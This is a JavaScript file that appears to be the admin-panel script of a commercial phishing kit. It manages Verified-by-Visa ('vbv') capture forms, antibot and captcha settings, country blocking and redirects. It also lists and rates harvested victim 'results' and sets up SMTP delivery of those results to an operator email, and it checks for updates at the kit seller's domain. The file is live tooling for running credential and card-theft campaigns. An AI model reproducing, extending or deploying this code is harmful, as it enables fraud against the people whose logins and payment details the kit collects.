$(document).ready(function() {
	var link = $('#link').val();
	const rollSound = new Audio(link+"assets/audio/b.mp3");
	rollSound.volume = 0.01;
	$(document).on('click', '.menu-btn,.action,.save_setting,.reset_statistics,.add_vbv,.save_vbv', function(event) {
		event.preventDefault();
		rollSound.play();
	});

	// ---------------------------------------------------------------------------------
	// check for updates
	setTimeout(() => {
		$.get("https://xcazanova.com/update/morphine", null ,function (data, textStatus, jqXHR) {
			var version = $('#version').val();
			if (Number(data) > Number(version)) {
				console.log('update available v'+Number(data));
				$('.update_wrapper').text('UPDATE AVAILABLE v'+Number(data)).css('display', 'block');
			}
		});
	}, 2000);

	$(document).on('click', '.update_wrapper', function(event) {
		window.open('https://xcazanova.com/');
	});

	// ---------------------------------------------------------------------------------

	$(document).on('click', '.save_setting', function(event) {
		if ($('#password').val().length < 6) { alert('weak password!'); return; }
		$.post(link+'pheonix/save_settings', {
			_: new Date().getTime(),
			username: $('#username').val(),
			password: $('#password').val(),
			email: $('#email').val(),
			antibot: $('#antibot').val(),
			captcha: $('#captcha').val(),
			only_maillist: $('#only_maillist').val(),
			// email_validate: $('#email_validate').val(),
			alert: $('#alert').val(),
			complete_title: $('#complete_title').val(),
			completed: $('#completed').val(),
			redirect: $('#redirect').val(),
			password_times: $('#password_times').val(),
			bg_logo: $('#bg_logo').val(),
			smtp_server: $('#smtp_server').val(),
			smtp_port: $('#smtp_port').val(),
			smtp_security: $('#smtp_security').val(),
			smtp_username: $('#smtp_username').val(),
			smtp_password: $('#smtp_password').val()
			// thanks_page: $('#thanks_page').val()
		}, function (data, textStatus, jqXHR) {
			console.log(data);
		});
	});

	$(document).on('click', '.reset_statistics', function(event) {
		$.get(link+'pheonix/reset', function (data, textStatus, jqXHR) {
			console.log(data);
			setTimeout(() => {
				location.reload();
			}, 500);
		});
	});

	$(document).on('click', '.download_backup', function(event) {
		window.open(link+'pheonix/backup');
	});

	// ---------------------------------------------------------------------------------

	$(document).on('click', '.home-btn', function(event) {
		$('.vbv-form').css('display', 'none');
		$('.setting-panel,.result-panel,.vbv-panel').css('display','none');
		$('.dashboard-panel').css('display','block');
	});

	$(document).on('click', '.setting-btn', function(event) {
		$('.vbv-form').css('display', 'none');
		$('.dashboard-panel,.result-panel,.vbv-panel').css('display','none');
		$('.setting-panel').css('display','block');
	});

	$(document).on('click', '.result-btn', function(event) {
		$('.vbv-form').css('display', 'none');
		$('.dashboard-panel,.setting-panel,.vbv-panel').css('display','none');
		$('.result-panel').css('display','block');
	});


	// ---------------------------------------------------------------------------------



	$(document).on('click', '.action-1', function(event) {
		var t = $(this);
		var id = $(this).data('id');
		var open = $(this).data('open');
		// return false;
		if (open == '1') {
			t.parents('.result_row').next().remove();
			t.data('open', '0');
		}else{
			$.getJSON(link+'pheonix/result/'+id, {_: new Date().getTime()}, function(json, textStatus) {
				var _html = '';
				console.log(json);
				_html = _html + '<tr class="result_row result"><td colspan="8" style="background-color:#EEEFF7;color:#1c1d21;">';
				$.each(json, function(index, val) {
					_html = _html +'<b>'+index+'</b>'+': '+val+'<br>';
				});
				_html = _html + '</td></tr>';
				t.parents('.result_row').after(_html);
				t.data('open', '1');
			});

		}
	});
	$(document).on('click', '.action-2', function(event) {
		var t = $(this);
		var id = $(this).data('id');
		$.get(link+'pheonix/rate/'+id+'/good', function(data) {
			$('.action[data-id="'+id+'"]').removeClass('active');
			if (data == 'good') { t.addClass('active'); }
		});
	});

	$(document).on('click', '.action-3', function(event) {
		var t = $(this);
		var id = $(this).data('id');
		$.get(link+'pheonix/rate/'+id+'/bad', function(data) {
			$('.action[data-id="'+id+'"]').removeClass('active');
			if (data == 'bad') { t.addClass('active'); }
		});
	});


	$(document).on('click', '.action-5', function(event) {
		var id = $(this).data('id');
		$.get(link+'pheonix/remove/'+id, function(data) {
			$('.result_row[data-id="'+id+'"]').remove();
		});
	});

// ---------------------------------------------------------------------------------

$(document).on('click', '.countries_wrapper .country', function(event) {
	event.preventDefault();
	rollSound.play();
	var _t = $(this);
	var code = $(this).data('id');
	var new_status = 'active';
	if ($(this).hasClass('active') === true) {
		new_status = 'block';
	}
	$.get(link+'pheonix/country/'+code+'/'+new_status, function(data) {
		// console.log(data);
		if (data == 'block') {
			_t.removeClass('active');
		}else{
			_t.addClass('active');
		}
	});
});



$(document).on('click', '.countries_title span.allow_all', function(event) {
	event.preventDefault();
	rollSound.play();
	$.get(link+'pheonix/country/ALL/active', function(data) {
		$('.countries_wrapper .country').addClass('active');
	});
});

$(document).on('click', '.countries_title span.block_all', function(event) {
	event.preventDefault();
	rollSound.play();
	$.get(link+'pheonix/country/ALL/block', function(data) {
		$('.countries_wrapper .country').removeClass('active');
	});
});




// ---------------------------------------------------------------------------------

$(document).on('click', '.test-smtp', function(event) {
	event.preventDefault();

	if ($('#email').val() === '0xcazanova@gmail.com') {
		alert('PLEASE CHANGE THE RESULT EMAIL FIRST AND SAVE THE SETTINGS, THEN TRY AGAIN.');
		return false;
	}

	rollSound.play();
	var _t = $(this);

	$.post(link+'pheonix/smtp_test', {
		_: new Date().getTime(),
		smtp_server: $('#smtp_server').val(),
		smtp_port: $('#smtp_port').val(),
		smtp_security: $('#smtp_security').val(),
		smtp_username: $('#smtp_username').val(),
		smtp_password: $('#smtp_password').val(),
	}, function (data, textStatus, jqXHR) {
		console.log(data);
		if(data === 'sent') {
			alert('AN EMAIL TEST SENT USING THE SMTP, CHECK YOUR EMAIL.');
		}else{
			alert('FAILED TO SEND EMAIL USING THIS SMTP, CHECK THE SMTP DETAILS.');
		}
	});
});


// ---------------------------------------------------------------------------------


// action-1
// action-2
// action-3
// action-4
// action-5
// data('id')



});
